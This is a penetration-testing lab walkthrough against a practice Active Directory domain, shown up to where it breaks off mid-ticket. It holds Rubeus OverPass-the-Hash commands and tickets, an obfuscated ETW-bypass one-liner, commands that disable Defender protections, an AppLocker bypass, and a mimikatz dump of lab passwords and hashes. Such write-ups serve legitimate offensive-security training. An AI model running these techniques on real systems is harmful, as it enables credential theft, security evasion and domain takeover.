(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True


[*] Username : B6UB7HZK
[*] Domain : QLBBSBT4
[*] Password : 53WT3W9V
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 5216
[+] LUID : 0x6b83f75

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)


[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 112738165
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0x6b83f75
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/24/2024 4:43:27 AM
EndTime : 6/24/2024 2:43:27 PM
RenewTill : 7/1/2024 4:43:27 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : vFSUdbYi/L1jR619cSPz4UKj3oKnLL2s/c91tIoIfIw=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new command prompt opens. The new command prompt opens with a logon type 9, which is similar to
using runas /netonly. Under logon type 9, accessing local resources reveals the original username, while
accessing network resources utilizes the new credentials. The following commands are executed in the
new command prompt process.
C:\Windows\system32>set username
USERNAME=student163
C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$\
Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc.dollarcorp.moneycorp.local\C$

05/08/2021 01:20 AM <DIR> PerfLogs


11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
05/18/2024 01:32 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,520,020,992 bytes free

C:\Windows\system32>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd.exe


Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\svcadmin>set username
set username
USERNAME=svcadmin

C:\Users\svcadmin>set computername
set computername
COMPUTERNAME=DCORP-DC

Lateral Movement – 2 (Using Derivative Admin)


A Derivative Admin refers to a user or group that indirectly gains administrative privileges over one or
more systems through a chain of permissions or group memberships. This concept is critical in
understanding privilege escalation paths in complex environments, such as Active Directory (AD) domains.

How Derivative Admins Work

In a typical AD environment, users and groups can be granted various levels of access to resources.
Sometimes, a user may not have direct administrative rights on a system but may have permissions that
allow them to gain such rights indirectly. Here are some ways derivative administrative access can occur:

1. Group Memberships: A user may be a member of a group that has administrative privileges on a
particular machine. For instance, if User A is a member of Group B, and Group B has administrative
rights on Machine C, then User A effectively has administrative rights on Machine C through Group
B.

2. Nested Groups: AD supports nested groups, where one group can be a member of another group.
This nesting can create complex paths of permissions. For example, User A is in Group B, which is
in Group C, and Group C has administrative privileges on Machine D. User A has administrative
privileges on Machine D due to these nested group memberships.

3. ACLs (Access Control Lists): Permissions defined in ACLs can grant administrative capabilities to
users or groups indirectly. For example, a user might have permissions to reset passwords or
modify group memberships, allowing them to escalate privileges.
4. Resource Delegation: Administrative tasks can be delegated to users or groups. A user with
delegated administrative permissions on certain resources can perform administrative actions
without being a direct administrator.

Example Scenario

Consider an AD environment with the following setup:

• User Alice is a member of Group "IT Support".

• "IT Support" is a member of the "Server Admins" group.

• The "Server Admins" group has administrative rights on all servers.

In this case, Alice is a derivative admin on the servers because her membership in "IT Support" indirectly
grants her administrative rights through the "Server Admins" group.

From the screenshot, we can see that student163 has administrative privileges on the machine DCORP-STD163. student163 is also a member of the RDPUsers group, which has administrative privileges on the machine DCORP-ADMINSRV, so student163 is a derivative admin of DCORP-ADMINSRV through that group. We can confirm the same access with the Find-PSRemotingLocalAdminAccess.ps1 script, which attempts a PowerShell Remoting connection to every host in a list and prints the ones that accept it. We will then move laterally to DCORP-ADMINSRV and enumerate further.
PS C:\Users\student163> . C:\Ad\Tools\Find-PSRemotingLocalAdminAccess.ps1
PS C:\Users\student163> Find-PSRemotingLocalAdminAccess -ComputerFile "C:\Users\student163\Desktop\shared\Computers.txt"
dcorp-adminsrv
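The check the script performs can be written in a few lines, and it is worth making one distinction the lab script does not: a host can accept a remoting connection because the caller is a local administrator (the derivative-admin case described above) or merely because the caller is in Remote Management Users, which gives a shell but no admin rights. The function below is an added example and is not the lab's Find-PSRemotingLocalAdminAccess.ps1; it assumes WinRM is reachable on the targets and works with either a normal domain token or a netonly token from OverPass-the-Hash. The remote probe uses only cmdlets and whoami.exe, so it also works when the target runs PowerShell in Constrained Language Mode.

```powershell
# Added example, not the lab's Find-PSRemotingLocalAdminAccess.ps1.
# Probes each host over WinRM and reports whether the caller arrived as a local admin.
function Find-RemotingAdminAccess {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string[]] $ComputerName,
        [int] $ThrottleLimit = 32
    )
    $invoke = @{
        ComputerName  = $ComputerName
        ThrottleLimit = $ThrottleLimit        # hosts are probed in parallel
        ErrorAction   = 'SilentlyContinue'
        ErrorVariable = 'failed'              # one error record per host that rejected us
        ScriptBlock   = {
            # Runs on the target. A remoting session gets the caller's full token, so
            # BUILTIN\Administrators (S-1-5-32-544) is present and enabled only for real admins.
            $groups  = whoami /groups /fo csv | ConvertFrom-Csv
            $isAdmin = [bool]($groups | Where-Object {
                $_.SID -eq 'S-1-5-32-544' -and $_.Attributes -notmatch 'deny only' })
            [pscustomobject]@{
                Host       = $env:COMPUTERNAME
                RemoteUser = "$env:USERDOMAIN\$env:USERNAME"
                LocalAdmin = $isAdmin
            }
        }
    }
    foreach ($r in (Invoke-Command @invoke)) {
        [pscustomobject]@{ Host = $r.Host; RemoteUser = $r.RemoteUser; LocalAdmin = $r.LocalAdmin; Error = $null }
    }
    foreach ($e in $failed) {
        # For remoting transport failures (access denied, WinRM not listening, ...)
        # the error's TargetObject is the computer name that was being contacted.
        [pscustomobject]@{ Host = "$($e.TargetObject)"; RemoteUser = $null; LocalAdmin = $false; Error = $e.Exception.Message }
    }
}

# Usage with the lab's computer list (path as used above):
# Find-RemotingAdminAccess -ComputerName (Get-Content C:\Users\student163\Desktop\shared\Computers.txt) |
#     Where-Object LocalAdmin | Select-Object Host, RemoteUser
```

When run from a logon type 9 process (the OverPass-the-Hash shells above), RemoteUser shows the injected identity, which is a quick way to confirm which credentials actually reached each host.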

Dumping credentials on DCORP-ADMINSRV


PS C:\Windows\system32> $Session = New-PSSession -ComputerName DCORP-ADMINSRV
PS C:\Windows\system32> Enter-PSSession -Session $Session
[DCORP-ADMINSRV]: PS C:\Users\student163\Documents> [Reflection.Assembly]::"l`o`AdwIThPa`Rti`AlnamE"(('S'+'ystem'+'.C'+'ore'))."g`E`TTYPE"(('Sys'+'tem.Di'+'agno'+'stics.Event'+'i'+'ng.EventProv'+'i'+'der'))."gET`FI`eLd"(('m'+'_'+'enabled'),('NonP'+'ubl'+'ic'+',Instance'))."seTVa`l`Ue"([Ref]."a`sSem`BlY"."gE`T`TyPE"(('Sys'+'tem'+'.Mana'+'ge'+'ment.Aut'+'o'+'mation.Tracing.'+'PSEtwLo'+'g'+'Pro'+'vi'+'der'))."gEtFIe`Ld"(('e'+'tw'+'Provid'+'er'),('N'+'o'+'nPu'+'b'+'lic,Static'))."gE`Tva`lUe"($null),0)
Cannot invoke method. Method invocation is supported only on core types in this language mode.
At line:1 char:1
+ [Reflection.Assembly]::"l`o`AdwIThPa`Rti`AlnamE"(('S'+'ystem'+'.C'+'o ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : MethodInvocationNotSupportedInConstrainedLanguage

The remote session is running in Constrained Language Mode, which we can confirm from within the session:
[DCORP-ADMINSRV]: PS C:\Users\student163\Documents> $ExecutionContext.SessionState.Languagemode
ConstrainedLanguage

In all probability this is caused by AppLocker or WDAC (Windows Defender Application Control). When an AppLocker script rule collection or a WDAC policy is enforced on a machine, PowerShell 5 and later runs any script that the policy does not explicitly allow in Constrained Language Mode, and this applies equally to the local console, to local scripts and to PowerShell Remoting sessions.

We can use the cmdlet Get-AppLockerPolicy to check if AppLocker is enabled on the machine.
[DCORP-ADMINSRV]: PS C:\Users\student163\Documents> Get-AppLockerPolicy -Effective | Select -ExpandProperty RuleCollections

PublisherConditions : {*\O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*,*}


PublisherExceptions : {}
PathExceptions : {}
HashExceptions : {}
Id : 38a711c4-c0b8-46ee-98cf-c9636366548e
Name : Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US
Description :
UserOrGroupSid : S-1-1-0
Action : Allow

PublisherConditions : {*\O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*,*}


PublisherExceptions : {}
PathExceptions : {}
HashExceptions : {}
Id : 8a64fa2c-8c17-415a-8505-44fc7d7810ad
Name : Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US
Description :
UserOrGroupSid : S-1-1-0
Action : Allow

PathConditions : {%PROGRAMFILES%\*}
PathExceptions : {}
PublisherExceptions : {}
HashExceptions : {}
Id : 06dce67b-934c-454f-a263-2515c8796a5d
Name : (Default Rule) All scripts located in the Program Files folder
Description : Allows members of the Everyone group to run scripts that are located in the
Program Files folder.
UserOrGroupSid : S-1-1-0
Action : Allow

PathConditions : {%WINDIR%\*}
PathExceptions : {}
PublisherExceptions : {}
HashExceptions : {}
Id : 9428c672-5fc3-47f4-808a-a0011f36dd2c
Name : (Default Rule) All scripts located in the Windows folder
Description : Allows members of the Everyone group to run scripts that are located in the
Windows folder.
UserOrGroupSid : S-1-1-0
Action : Allow

As per the output, Everyone (S-1-1-0) can run any PowerShell script located under %PROGRAMFILES% or %WINDIR%; these are the two AppLocker default script rules. A script that the policy allows runs in FullLanguage mode even when it is started from a ConstrainedLanguage session, so copying a script into one of those folders and executing it from there bypasses the restriction. Writing to either folder needs local administrator rights, which student163 has on this host.
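Before copying anything it is possible to ask AppLocker directly which locations will work. The function below is an added example, not part of the lab notes: it evaluates candidate paths against the effective policy with Test-AppLockerPolicy and maps the decision to the language mode PowerShell will give the script. It assumes the candidate paths point at existing copies of the file (publisher and hash rules can only be evaluated against a real file) and uses only cmdlets and property access, so it runs from the constrained remote session itself.

```powershell
# Added example, not from the lab notes. Predicts, per path, whether AppLocker will
# allow a script and therefore whether PowerShell will run it in FullLanguage.
function Test-ScriptLanguageMode {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string[]] $Path,
        [string] $User = 'Everyone'
    )
    $policy = Get-AppLockerPolicy -Effective

    # Warn if no Script rule collection is enforced: then nothing forces CLM via AppLocker.
    $scriptEnforced = $false
    foreach ($rc in $policy.RuleCollections) {
        if ($rc.RuleCollectionType -eq 'Script' -and $rc.EnforcementMode -eq 'Enabled') { $scriptEnforced = $true }
    }
    if (-not $scriptEnforced) {
        Write-Warning 'No enforced Script rule collection found; check for a WDAC policy instead.'
    }

    # Test-AppLockerPolicy evaluates each file against the effective policy for $User.
    Test-AppLockerPolicy -PolicyObject $policy -Path $Path -User $User | ForEach-Object {
        [pscustomobject]@{
            FilePath       = $_.FilePath
            PolicyDecision = $_.PolicyDecision      # Allowed / Denied / DeniedByDefault
            MatchingRule   = $_.MatchingRule
            ExpectedMode   = if ($_.PolicyDecision -eq 'Allowed') { 'FullLanguage' } else { 'ConstrainedLanguage' }
        }
    }
}

# Usage in the lab's session: the user-profile copy is denied by default (so it would
# run constrained), the copy under Program Files matches the default path rule.
$ExecutionContext.SessionState.LanguageMode
Test-ScriptLanguageMode -Path 'C:\Users\student163\Documents\Invoke-MimiEx.ps1',
                              'C:\Program Files\Invoke-MimiEx.ps1'
```

The same evaluation is what PowerShell performs when a script is invoked, so a path reported as Allowed here is one from which the script will get FullLanguage.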

We will copy the Invoke-Mimi script (Invoke-MimiEx.ps1 in the listing below) to one of those locations. Before that we disable Defender's real-time, behaviour, intrusion-prevention and IOAV protection so the file is not quarantined on write. Two caveats: if tamper protection is enabled, Set-MpPreference cannot turn real-time monitoring off, and each of these changes is logged by Defender itself (event 5001 in the Microsoft-Windows-Windows Defender/Operational log when real-time protection is disabled) and reported centrally if the host is onboarded to Defender for Endpoint, whose installation folder appears in the Program Files listing below.
[DCORP-ADMINSRV]: PS C:\Users\student163\Documents> Set-MpPreference -DisableRealtimeMonitoring
$true
[DCORP-ADMINSRV]: PS C:\Users\student163\Documents> Set-MpPreference -DisableBehaviorMonitoring
$true
[DCORP-ADMINSRV]: PS C:\Users\student163\Documents> Set-MpPreference -
DisableIntrusionPreventionSystem $true
[DCORP-ADMINSRV]: PS C:\Users\student163\Documents> Set-MpPreference -DisableIOAVProtection $true

Now we will copy the script to the Program Files folder. We can copy it either using the GUI or a command.
[dcorp-adminsrv]: PS C:\Users\student163\Documents> cd 'Program Files'
[dcorp-adminsrv]: PS C:\Program Files> ls

Directory: C:\Program Files

Mode LastWriteTime Length Name


---- ------------- ------ ----
d----- 5/8/2021 1:27 AM Common Files
d----- 5/8/2021 1:15 AM Internet Explorer
d----- 5/8/2021 1:15 AM ModifiableWindowsApps
d----- 11/11/2022 1:57 AM Windows Defender
d----- 1/1/2024 4:48 AM Windows Defender Advanced Threat Protection
d----- 5/8/2021 2:34 AM Windows NT
d----- 5/8/2021 1:27 AM WindowsPowerShell
-a---- 6/24/2024 10:36 PM 2070895 Invoke-MimiEx.ps1

Now we will dump the credentials.


[dcorp-adminsrv]: PS C:\Program Files> .\Invoke-MimiEx.ps1

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::ekeys

Authentication Id : 0 ; 208687 (00000000:00032f2f)


Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:20:24 AM
SID : S-1-5-96-0-2

* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e
Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
* Key List :
aes256_hmac 82ecf869176628379da0ae884b582c36fc2215ef7e8e3e849d720847299257ff
aes128_hmac 3f3532b2260c2851bf57e8b5573f7593
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565

Authentication Id : 0 ; 98121 (00000000:00017f49)


Session : Service from 0
User Name : websvc
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:15:55 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1114

* Username : websvc
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : AServicewhichIsNotM3@nttoBe
* Key List :
aes256_hmac 2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
aes128_hmac 86a353c1ea16a87c39e2996253211e41
rc4_hmac_nt cc098f204c5887eaa8253e7c2749156f
rc4_hmac_old cc098f204c5887eaa8253e7c2749156f
rc4_md4 cc098f204c5887eaa8253e7c2749156f
rc4_hmac_nt_exp cc098f204c5887eaa8253e7c2749156f
rc4_hmac_old_exp cc098f204c5887eaa8253e7c2749156f
Authentication Id : 0 ; 98117 (00000000:00017f45)
Session : Service from 0
User Name : appadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:15:55 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1117

* Username : appadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : *ActuallyTheWebServer1
* Key List :
aes256_hmac 68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb
aes128_hmac 449e9900eb0d6ccee8dd9ef66965797e
rc4_hmac_nt d549831a955fee51a43c83efb3928fa7
rc4_hmac_old d549831a955fee51a43c83efb3928fa7
rc4_md4 d549831a955fee51a43c83efb3928fa7
rc4_hmac_nt_exp d549831a955fee51a43c83efb3928fa7
rc4_hmac_old_exp d549831a955fee51a43c83efb3928fa7

Authentication Id : 0 ; 996 (00000000:000003e4)


Session : Service from 0
User Name : DCORP-ADMINSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/21/2024 3:15:45 AM
SID : S-1-5-20

* Username : dcorp-adminsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565

Authentication Id : 0 ; 20904 (00000000:000051a8)


Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:15:45 AM
SID : S-1-5-96-0-0

* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e
Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
* Key List :
aes256_hmac 82ecf869176628379da0ae884b582c36fc2215ef7e8e3e849d720847299257ff
aes128_hmac 3f3532b2260c2851bf57e8b5573f7593
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565
Authentication Id : 0 ; 20826 (00000000:0000515a)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:15:45 AM
SID : S-1-5-96-0-1

* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e
Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
* Key List :
aes256_hmac 82ecf869176628379da0ae884b582c36fc2215ef7e8e3e849d720847299257ff
aes128_hmac 3f3532b2260c2851bf57e8b5573f7593
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565

Authentication Id : 0 ; 246873 (00000000:0003c459)


Session : RemoteInteractive from 2
User Name : srvadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:25:13 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1115

* Username : srvadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4
rc4_hmac_nt a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_old a98e18228819e8eec3dfa33cb68b0728
rc4_md4 a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_nt_exp a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_old_exp a98e18228819e8eec3dfa33cb68b0728

Authentication Id : 0 ; 999 (00000000:000003e7)


Session : UndefinedLogonType from 0
User Name : DCORP-ADMINSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/21/2024 3:15:44 AM
SID : S-1-5-18

* Username : dcorp-adminsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565

Username    AES Hashes (aes256_hmac)
websvc      2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
appadmin    68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb
srvadmin    145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4

Username    NTLM Hashes (rc4_hmac_nt)
websvc      cc098f204c5887eaa8253e7c2749156f
appadmin    d549831a955fee51a43c83efb3928fa7
srvadmin    a98e18228819e8eec3dfa33cb68b0728

We will now enumerate further to find where a Domain Admin session is present. For this, we open a
command prompt or a PowerShell session in the context of each of the obtained users using an
OverPass-the-Hash attack.

OverPass The Hash

websvc
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:websvc
/aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /opsec
/createnetonly:powershell.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True


[*] Username : OBD5C0PO
[*] Domain : BI5N2842
[*] Password : 31X4JLQI
[+] Process : 'powershell.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 6108
[+] LUID : 0xa437374

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)


[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALwebsvc
[*] Using aes256_cts_hmac_sha1 hash:
2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\websvc'
[*] Target LUID : 172192628
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIF5jCCBeKgAwIBBaEDAgEWooIEvzCCBLthggS3MIIEs6ADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOC
BFswggRXoAMCARKhAwIBAqKCBEkEggRFjc/lWbb37U8wXk744S3QtZOWdcwRuoYjzZ5Fgmu/wdOAMv7Y
mKPPQQI6nvS8r+peDqIaxAgzndv+fdUeENcVEOW+kEaLgbgFzlRUQy9espJsi3naD261s8IXqWgNSqdL
K/iU3myX34W/6cK2+FkiB4PcIYgp5olTW/7ti9lJgtyKaV2UMVPLoIH+PwbjknFD0QDZR2b70mOxNcoj
YgBN7fYZ4Dz29HP3SNYnf0lXADoVT5bZ8q0ldB/dXcXqvUcp6OC49TBGV4Pujd5a81IVOAgzdzLvWgSK
B5u9x11T3bliNvxpFcs0J048qhNsKx+twCV9IwH92dQaC8lMuwhrqN+tCLg3r1JY08ShuvTmayMbZ508
NexpXbHujrXID5C+40Zb9xKkg+Z2/SOSGWA5aVsTgY+mJgWw6UyJCBEAE9SSVd/d+0qXh039MR+YROX6
ma/ri50dLxj+WFrs4qDsVEOmItkpQllJORhxV9in8HoDjqUH9jUHS2l2M7iCQa7fJYY0pY7W2FwhxEkB
jKLLGXaFB2KiFXLvQrh1L5undVnGzvjxb2TLVujDQvu9eSDA89Ux+/5UrI/kFd75lffQlBhwmzjEWiJb
kvDYKE1RDDG8lpz5dqYqQOPozZHDSI+6WsjjUrH40HCq20luQUKgrTMyXmmzPGgoDI0HLqLGcund+nS6
m6AXGPXArxir9nSRT/qUX7UC1eHnCauYa+gWAqQGHh5dv/H9nr0VeXaoakhdR4tLlx1ZW2ibbhPyw/oB
RhIASEZoks4/ug/PGjeaeiZV86Ks4ydeBGp4sUYyH51MwO5fHH0x+bK4Q9o3B/6/wichAmpps9mGOQjc
KmWgCmgC4rRknq49uQDqfuqOEzcZ8iOmcQFLVjC6xtpMujYB4/JlydMA8TzvCbmuffhcBcDSNel6GGy1
